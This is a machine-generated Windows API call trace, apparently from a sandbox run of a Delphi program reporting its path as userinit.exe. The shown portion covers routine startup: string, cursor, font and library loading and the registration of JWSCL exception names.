[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff31, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff30, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff4f, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff4e, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff4d, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff4c, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0201.120] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0201.120] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0201.120] GetCurrentThreadId () returned 0x8e4
[0201.120] GlobalAddAtomA (lpString="WndProcPtr02930000000008E4") returned 0xc0eb
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xfefc, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xfefb, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfefa, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef9, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef8, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef7, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef6, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef5, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef4, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef3, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef2, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef1, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xfef0, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff0f, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff0e, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff0d, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff0c, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff0b, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff0a, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff09, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff08, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff07, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff06, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff05, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff04, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff03, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff02, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff01, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff00, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff1f, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff1e, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff1d, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff1c, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0201.121] LoadStringA (in: hInstance=0x2930000, uID=0xff1b, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff1a, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff19, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff18, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff17, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff16, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff15, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff14, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff13, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff12, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff11, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff10, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff2f, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0201.122] LoadStringA (in: hInstance=0x2930000, uID=0xff2e, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0201.122] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0201.122] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0201.122] GetVersion () returned 0x1db10106
[0201.122] GetCurrentProcessId () returned 0x8e8
[0201.122] GlobalAddAtomA (lpString="Delphi000008E8") returned 0xc0f1
[0201.122] GetCurrentThreadId () returned 0x8e4
[0201.122] GlobalAddAtomA (lpString="ControlOfs02930000000008E4") returned 0xc0ea
[0201.122] RegisterClipboardFormatA (lpszFormat="ControlOfs02930000000008E4") returned 0xc18c
[0201.122] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0201.123] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0201.123] GetSystemMetrics (nIndex=19) returned 1
[0201.123] GetSystemMetrics (nIndex=75) returned 1
[0201.123] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a51320, fWinIni=0x0 | out: pvParam=0x2a51320) returned 1
[0201.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0201.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0201.123] LoadCursorA (hInstance=0x2930000, lpCursorName=0x7ff9) returned 0x1001f9
[0201.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0201.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0201.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0201.123] LoadCursorA (hInstance=0x2930000, lpCursorName=0x7ffa) returned 0x1101f3
[0201.123] LoadCursorA (hInstance=0x2930000, lpCursorName=0x7ffb) returned 0x100145
[0201.124] LoadCursorA (hInstance=0x2930000, lpCursorName=0x7ffc) returned 0x150135
[0201.124] LoadCursorA (hInstance=0x2930000, lpCursorName=0x7ffd) returned 0xa011f
[0201.124] LoadCursorA (hInstance=0x2930000, lpCursorName=0x7fff) returned 0x1d0105
[0201.125] LoadCursorA (hInstance=0x2930000, lpCursorName=0x7ffe) returned 0x110201
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0201.125] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0201.125] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0201.125] GetDC (hWnd=0x0) returned 0x56010821
[0201.125] GetDeviceCaps (hdc=0x56010821, index=90) returned 96
[0201.125] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0201.125] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0201.125] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2989a60, dwData=0x2a5156c) returned 1
[0201.126] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x22f38b, fWinIni=0x0 | out: pvParam=0x22f38b) returned 1
[0201.126] CreateFontIndirectA (lplf=0x22f38b) returned 0x430a0883
[0201.126] GetObjectA (in: h=0x430a0883, c=60, pv=0x22f17c | out: pv=0x22f17c) returned 60
[0201.126] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x22f237, fWinIni=0x0 | out: pvParam=0x22f237) returned 1
[0201.126] CreateFontIndirectA (lplf=0x22f313) returned 0x750a0872
[0201.126] GetObjectA (in: h=0x750a0872, c=60, pv=0x22f17c | out: pv=0x22f17c) returned 60
[0201.126] CreateFontIndirectA (lplf=0x22f2d7) returned 0x5f0a0851
[0201.126] GetObjectA (in: h=0x5f0a0851, c=60, pv=0x22f17c | out: pv=0x22f17c) returned 60
[0201.126] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0201.126] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f2eb, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.126] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x22f2eb | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0201.127] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x710000
[0201.127] GetKeyboardLayoutList (in: nBuff=64, lpList=0x22f26c | out: lpList=0x22f26c) returned 1
[0201.128] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0201.128] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0201.128] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d740000
[0201.128] GetProcAddress (hModule=0x6d740000, lpProcName="InitializeFlatSB") returned 0x6d77266f
[0201.128] GetProcAddress (hModule=0x6d740000, lpProcName="UninitializeFlatSB") returned 0x6d772542
[0201.128] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollProp") returned 0x6d771d29
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollProp") returned 0x6d77238d
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7720c9
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d771fdb
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollRange") returned 0x6d771e8d
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d771f0f
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollPos") returned 0x6d771ccd
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollPos") returned 0x6d77216d
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7722be
[0201.129] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7721e2
[0201.129] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0201.129] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0201.129] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0201.129] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0201.130] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0201.130] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0201.130] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0201.130] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0201.130] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0201.130] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0201.130] LoadStringA (in: hInstance=0x2930000, uID=0xff59, lpBuffer=0x22efcc, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0201.130] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0201.130] LoadStringA (in: hInstance=0x2930000, uID=0xff5a, lpBuffer=0x22efcc, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0201.130] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0201.130] LoadStringA (in: hInstance=0x2930000, uID=0xff5b, lpBuffer=0x22efcc, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0201.130] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0201.130] LoadStringA (in: hInstance=0x2930000, uID=0xff5c, lpBuffer=0x22efcc, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0201.130] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0201.130] SetErrorMode (uMode=0x8000) returned 0x1
[0201.130] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d820000
[0201.133] SetErrorMode (uMode=0x1) returned 0x8000
[0201.133] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreatePropertyFrame") returned 0x6d8220ea
[0201.133] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreateFontIndirect") returned 0x6d8220b7
[0201.133] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreatePictureIndirect") returned 0x6d8220c8
[0201.133] GetProcAddress (hModule=0x6d820000, lpProcName="OleLoadPicture") returned 0x6d8220d9
[0201.133] SysReAllocStringLen (in: pbstr=0x2a1fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a1fa98*="EJwsclUnsupportedException") returned 1
[0201.133] SysReAllocStringLen (in: pbstr=0x2a1fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a1fa80*="EJwsclPIDException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a1fa68*="EJwsclJwShellExecuteException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a1fa50*="EJwsclShellExecuteException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a1fa38*="EJwsclElevationException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a1fa20*="EJwsclAbortException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a1fa08*="EJwsclSuRunErrorException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a1f9f0*="EJwsclElevateProcessException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a1f9d8*="EJwsclCertApiException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a1f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a1f9a8*="EJwsclInvalidStartupInfo") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a1f990*="EJwsclFirewallNoExceptionsException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a1f978*="EJwsclFirewallInactiveException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a1f960*="EJwsclFirewallDelRuleException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a1f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a1f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a1f918*="EJwsclFirewallAddRuleException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a1f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a1f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a1f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a1f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a1f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a1f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a1f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a1f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a1f840*="EJwsclGetFWStateException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a1f828*="EJwsclSetFWStateException") returned 1
[0201.134] SysReAllocStringLen (in: pbstr=0x2a1f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a1f810*="EJwsclFirewallProfileInitException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a1f7f8*="EJwsclFirewallInitException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a1f7e0*="EJwsclGenericFirewallException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a1f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a1f7b0*="EJwsclInvalidRegistryPath") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a1f798*="EJwsclEndOfStream") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a1f780*="EJwsclClassTypeMismatch") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a1f768*="EJwsclInvalidHandle") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a1f750*="EJwsclInvalidIndex") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a1f738*="EJwsclInvalidSession") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a1f720*="EJwsclMissingEvent") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a1f708*="EJwsclInvalidPointerType") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a1f6f0*="EJwsclCreateProcessFailed") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a1f6d8*="EJwsclNilPointer") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a1f6c0*="EJwsclUnimplemented") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a1f6a8*="EJwsclInitWellKnownException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a1f690*="EJwsclKeyApiException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a1f678*="EJwsclKeyException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a1f660*="EJwsclHashApiException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a1f648*="EJwsclHashException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a1f630*="EJwsclCSPApiException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a1f618*="EJwsclCSPException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a1f600*="EJwsclTerminalSessionException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a1f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a1f5d0*="EJwsclTerminalServiceException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a1f5b8*="EJwsclTerminalServerConnectException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a1f5a0*="EJwsclTerminalServerException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a1f588*="EJwsclCryptUnsupportedException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a1f570*="EJwsclCryptApiException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a1f558*="EJwsclCryptException") returned 1
[0201.135] SysReAllocStringLen (in: pbstr=0x2a1f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a1f540*="EJwsclOSError") returned 1
